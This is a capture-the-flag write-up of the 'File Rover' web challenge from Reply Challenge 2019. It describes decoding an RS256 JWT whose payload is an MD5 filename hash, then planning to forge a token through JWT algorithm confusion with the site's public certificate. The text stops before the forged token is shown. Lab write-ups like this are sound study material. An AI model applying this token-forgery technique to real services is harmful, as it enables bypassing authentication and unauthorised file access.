File Rover - Web - Reply Challenge 2019

In this challenge we had a link to a site. The first thing that was peculiar about it was the invalid certificate. After telling the browser to ignore it, we were presented with a some download links:

Reading the source code of the page we can see an old commented link to a file called flag.txt:

    <td>4 Bytes</td>
    <td class="download-col">
        <button type="button" class="btn btn-light" disabled="disabled">EXPIRED</button>

The link for future.jpg points to


I recognized the JWT token structure and used to read it. The header is:

  "typ": "JWT",
  "alg": "RS256"

so a rsa 256 key was used to sign the token, and the payload is:

  "filename": "7b421df11a53e33d929ef4c025f79f83"

The immediate thought was that the filename parameter could be the hash of the filename, and it was indeed:

$ echo -n "future.jpg" | md5sum
7b421df11a53e33d929ef4c025f79f83  -

We could try to use the hash of flag.txt to create our own token but we need the key used to create it. A quick bruteforce try with some tools and wordlists did not work, and after a bit of research we found an article explaining a vulnerability that allowed to make the server use the public key to verify the signature instead of the private key. Remembering that the web site certificate was invalid, we thought about trying to use it to create to custom token to download flag.txt. Here is the final token: